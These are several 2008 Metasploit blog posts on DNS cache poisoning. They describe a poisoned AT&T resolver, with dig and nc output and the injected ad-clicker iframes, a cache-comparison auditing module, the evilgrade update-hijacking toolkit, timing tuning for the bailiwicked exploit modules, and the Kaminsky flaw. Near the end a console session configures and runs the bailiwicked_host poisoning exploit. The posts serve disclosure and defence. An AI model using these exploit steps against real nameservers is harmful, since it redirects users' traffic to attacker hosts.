DNS Attacks in the Wild

Posted by rapid7-admin Jul 29, 2008

Originally Posted by hdm

 

 

In a recent conversation with Robert McMillan (IDG), I described an in-the-wild attack against one of AT&T's DNS cache servers, specifically one that was configured as an upstream forwarder for an internal DNS machine at BreakingPoint Systems. The attackers had replaced the cache entry for www.google.com with a web page that loaded advertisements hidden inside an iframe. This attack affected anyone in the Austin, Texas region using that AT&T Internet Services (previously SBC) DNS server. The attack itself was not malicious, did not load malware, and from an operational standpoint, had zero impact. I contacted the ISP, worked with our IT folks to switch forwarding services, and wrote a cache auditing tool. I found the "wild" attack interesting, so I brought up the incident in that conversation with Robert McMillan and forwarded the associated logs and notes. Shortly after our conversation, Mr. McMillan published an article with a sensationalist title that, while containing most of the facts, attributed a quote to me that I simply did not say. Specifically, `"It's funny," he said. "I got owned."`

 

Most of the facts of the article are correct. I have no problem detailing the attack, how it worked, and how we detected and resolved it. I am careful about the wording, because I want to be clear that while this type of attack can be serious, in this case it was a five-minute annoyance that was designed as a revenue generator for the folks who launched it (click-through advertisement revenue). No systems were compromised, no data was stolen, and most importantly, the target of the attack was the ISP, not the company that I work for. Stating that my company was "compromised" leads the reader to believe that there was some sort of security breach, which is reinforced by the fabricated quote. Mr. McMillan has since published a correction, but by the time this trickles down to all of the IDG publications, the damage will have been done. At this time (09:00 CST), the correction is posted, but the articles themselves have not been updated.

 

To add some content to my whining, I have included further details on the actual attack. The DNS server in question was dns1.austtx.sbcglobal.net (151.164.20.201). This system accepted recursive requests from anywhere (not just subscribers) and is the default DNS server for anyone who purchased SBC Internet Services (in our case, a T1 line that was our primary until our fiber was run). Internally, we use two DNS servers, one going out the fiber, the other going out the T1 as a backup. Early Tuesday morning, some of the friends and family members of BreakingPoint employees noticed that the iGoogle web page was returning a 404 from their home internet connections. Once our folks got to the office, they noticed that every once in a while they could also reproduce it from within our network. Digging into it, we discovered that one of our internal DNS servers was still using SBC/AT&T as an upstream forwarder and that this server was returning the wrong results for www.google.com:

 

$ dig +short -t a www.google.com @151.164.20.201
www.l.google.com.
67.222.48.43

 

When querying the same address from the other DNS server, we saw the correct results:
$ dig +short -t a www.google.com @InternalDNS
www.l.google.com.
64.233.167.99
64.233.167.104
64.233.167.147

 

Requesting the main web page from the "poisoned" www.google.com server returned a very different response from the real Google server. This server returned four iframes: one showed a fake version of the Google web site, while the other three loaded automated ad-clickers from three other compromised servers.

 

$ echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | nc 67.222.48.43 80
HTTP/1.1 200 OK
Date: Tue, 29 Jul 2008 15:30:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.6
Transfer-Encoding: chunked
Content-Type: text/html

 

161

 

<iframe width=100% height=100% frameborder=0 src="http://72.14.205.99/"></iframe>
<iframe width=0 height=0  frameborder=0 src="http://www.ramhost.org/ads.php"></iframe>
<iframe width=0 height=0  frameborder=0 src="http://www.medicaltechnic.net/ads.php"></iframe>
<iframe width=0 height=0  frameborder=0 src="http://www.funreport.net/ads.php"></iframe>

 

We changed the upstream forwarder for our internal DNS to point to a patched server (the ubiquitous BBN 4.2.2.x systems; OpenDNS has issues[1]), contacted the ISP, and wrote a cache validator that does not require host access to the DNS server (see the previous post for more information on that). The lesson -- even if your own DNS servers are patched, make sure none of those systems use an upstream DNS that has not been. Since we contacted the ISP, this particular DNS server has been taken offline. I found a list of regional SBC DNS servers and prodded them with the porttest.dns-oarc.net service. The end result: of the 19 servers still online, 12 are still using static source ports, and each of these can be reached by anyone on the Internet. I wonder if they are waiting on ISC to fix BIND's performance problems.
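
For anyone who wants to run the same check, prodding a resolver through porttest.dns-oarc.net is just a TXT lookup sent through the server you want to grade; the TXT answer reports how random that resolver's source ports look. A minimal example (the resolver address here is a placeholder, substitute the server you want to test):

$ dig +short -t txt porttest.dns-oarc.net @ResolverToTest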

 

-HD

 

1. OpenDNS returns poisoned records. Intentionally poisoned. For example, www.google.com points to a SQUID cache server run by OpenDNS, not the real Google server. While I admire a service that improves security, I wonder about the impact of diverting private communications through their web cache servers. Does Google's privacy statement apply to the monitoring of traffic by OpenDNS? I don't think so.

 

$ dig +short -t a www.google.com @208.67.222.222
google.navigation.opendns.com.
208.69.32.231
208.69.32.230

 

$ HEAD 208.69.32.231
200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Wed, 30 Jul 2008 06:49:13 GMT
Via: 1.0 .:80 (squid)

Originally Posted by hdm

 

 

After seeing the SBC/AT&T server for Austin get poisoned, serve up advertisements, and eventually get taken offline, I decided to add a module to compare DNS results between two servers. In the following example, the ".gov" TLD has been poisoned with the bailiwicked_domain Metasploit module:

 

msf > use auxiliary/spoof/dns/compare_results

 

msf auxiliary(compare_results) > set BASEDNS 4.2.2.3
BASEDNS => 4.2.2.3

 

msf auxiliary(compare_results) > set TARGDNS poisoned.server
TARGDNS => poisoned.server

 

msf auxiliary(compare_results) > set NAMES www.fbi.gov
NAMES => www.fbi.gov

 

msf auxiliary(compare_results) > run
[*] Comparing results between 4.2.2.3 and poisoned.server...
[*] Querying servers for www.fbi.gov...
[*] Analyzing results for 1 entries...
[*]   - www.fbi.gov A 64.86.183.120
[*]   - www.fbi.gov A 64.86.183.99
[*]   - www.fbi.gov CNAME a33.g.akamai.net
[*]   - www.fbi.gov CNAME fbi.edgesuite.net
[*]   + www.fbi.gov A 1.3.3.7
[*] Auxiliary module execution completed

Originally Posted by hdm

 

 

Francisco Amato of Infobyte Security Research just announced ISR-evilgrade v1.0.0, a toolkit for exploiting products that perform online updates in an insecure fashion. This tool works in conjunction with man-in-the-middle techniques (DNS, ARP, DHCP, etc.) to exploit a wide variety of applications. The demonstration video uses the CAU/Metasploit DNS exploit in conjunction with the Sun Java update mechanism to execute code on a fully patched Windows machine. For more information, see the README and slide deck. The first release includes exploits for Sun Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar, DAP, Notepad++, and Speedbit.

Originally Posted by hdm

 

 

The bailiwicked modules (host and domain) were updated today to include the ability to predict the time window between the outgoing request from the target nameserver and the response from the real nameserver(s). This measurement is used to tune the number of spoofed replies sent by the exploit. The result is a big increase in exploit reliability, especially when the target domain has a ton of nameservers (Yahoo has eight) or changes its responsiveness during the test (BIND tends to slow down when it has a full cache). The new self-tuning code is activated when the XIDS option is set to '0', which is now the default. FreeBSD and Mac OS X support are still in the works, but should be functional sometime this weekend. The timing analysis feature can also be accessed through a new command ('racer'). In the examples below, the first command tests the timing between the nameserver at 192.168.0.2 and the metasploit.com DNS servers. The second command tests the timing between the nameserver 4.2.2.3 (a public DNS server) and the metasploit.com DNS servers. You can see from the results that the timing differences are significant:

 

msf auxiliary(bailiwicked_host) > racer 192.168.0.2 metasploit.com
[*]   race calc: 50 queries | min/max/avg time: 0.05/0.23/0.09 | min/max/avg replies: 6/121/49

 

msf auxiliary(bailiwicked_host) > racer 4.2.2.3 metasploit.com
[*]   race calc: 50 queries | min/max/avg time: 0.02/0.17/0.05 | min/max/avg replies: 1/29/6

 

In the first case (192.168.0.2), the average number of spoofed replies we can get in before the real server responds is around 49, which means about 80 fake responses. In the second example, the average is only 6, which means about 12 fake responses. To be conservative, these modules take the average, multiply it by 1.5, then divide it by the number of nameservers. This leads to a fairly accurate timing estimate and quicker attacks.
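
For illustration, here is that tuning arithmetic worked out on the command line for the first measurement above. The division by two assumes the target domain has two nameservers, which is just an example figure and not something racer reports:

$ echo "49 * 1.5" | bc
73.5
$ echo "scale=2; 49 * 1.5 / 2" | bc
36.75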

BailiWicked

Posted by rapid7-admin Jul 24, 2008

Originally Posted by I)ruid

 

 

If you haven't already noticed by now, we've recently published two modules which exploit Kaminsky's DNS cache poisoning flaw.  I'll get to those in a second, but first a word about disclosure.

 

In the short time that these modules have been available, I've received personal responses from a LOT of people, spanning the spectrum from "OMG how could you do this to the Internet users???" to "Great work, now I know what I'm up against...  We need more open researchers like you guys."  In all honesty, I was content to wait for Kaminsky's presentation at BlackHat before coding these up, because I didn't have the details and was too busy to go figure them out.  But once public speculation started nailing the issue (form your own conclusions on whether the speculation itself was "responsible" or not), followed by the accidental leak of the full details and then Kaminsky himself describing the bug, via the story of how he found it, in an interview shortly thereafter, working exploits were only a (likely short) matter of time.  I was personally aware of multiple exploits in various levels of development before, during, and after HD and I wrote ours, so we felt that at this point publishing working exploit code was fair game.  We hope that those of you who were unfortunate enough to not have the vulnerability information shared with you originally enjoy testing your nameserver implementations and products, and get your own patches out (or, in the consumer case, applied) posthaste.

 

So, on to our new modules.  There's no reason to rehash the deep tech regarding packet formats and spoofing techniques, as most of the speculation linked above was correct, and the original leak has been mirrored just about everywhere.  In short, the way this flaw works is that it combines two previously known but somewhat mitigated flaws to achieve success:

 

The first flaw is that since DNS (over UDP) is connectionless, it can easily be spoofed.  The original primary mitigation against this was a 16-bit transaction ID, used to correlate requests and replies, which an attacker would have to guess in order to correctly spoof a reply packet.  This makes spoofing harder, but not an insurmountable task; you just need to be able to send a whole lot of packets to eventually get one that matches the transaction ID chosen for the request packet.
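
To put that 16-bit ID into perspective, a quick back-of-the-envelope calculation: if the source port is fixed and you can squeeze in, say, 100 spoofed replies before the real answer arrives (an assumed figure for illustration), each race has roughly a 100-in-65536 chance of success, so on average you need several hundred races:

$ echo "scale=4; 100 / 65536" | bc
.0015
$ echo "65536 / 100" | bc
655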

 

The second flaw was that additional records included in replies from another nameserver would be inserted into the cache.  This is core protocol functionality; however, the original problem was somewhat mitigated by the in-bailiwick constraint, which essentially limits the additional records that can be cached from a reply to hostnames within the domain that was queried.  Sounds reasonable; this prevents nameservers from doing malicious things to records in domains that they weren't queried for or aren't authoritative for, while still allowing nameservers that are authoritative for a domain to update the records they need to.

 

When you combine the attacks for these two flaws, however, and introduce nameserver query recursion, an attacker can essentially cause the target nameserver to make as many queries as the attacker wants while also pretending to be the authoritative nameserver and spoofing the responses.  This achieves the birthday attack against the transaction ID and successfully updates the nameserver record for a domain to point to a malicious nameserver address.  You can also use this trick to inject cache entries for individual hostname records, as long as those hostnames are both not already cached and in-bailiwick.

 

The two Metasploit modules which implement these attacks are "DNS BailiWicked Host Attack" for injecting individual uncached host records into the target nameserver's cache, and "DNS BailiWicked Domain Attack" for replacing a target domain's nameserver records in a target nameserver's cache.  Currently these must be run from the MSF "trunk" development branch, as they rely on Net::DNS and raw socket functionality that only exists in the development branch of MSF.  The raw socket code also currently works only when running MSF under Linux.
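
For those who want to kick the tires, here is a rough sketch of how the host module is driven from the console. The values are placeholders, and apart from XIDS the option names are recalled from memory, so run 'show options' in your own trunk checkout to confirm them:

msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > set RHOST target.nameserver
RHOST => target.nameserver
msf auxiliary(bailiwicked_host) > set HOSTNAME pwned.example.com
HOSTNAME => pwned.example.com
msf auxiliary(bailiwicked_host) > set NEWADDR 1.3.3.7
NEWADDR => 1.3.3.7
msf auxiliary(bailiwicked_host) > set XIDS 0
XIDS => 0
msf auxiliary(bailiwicked_host) > run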
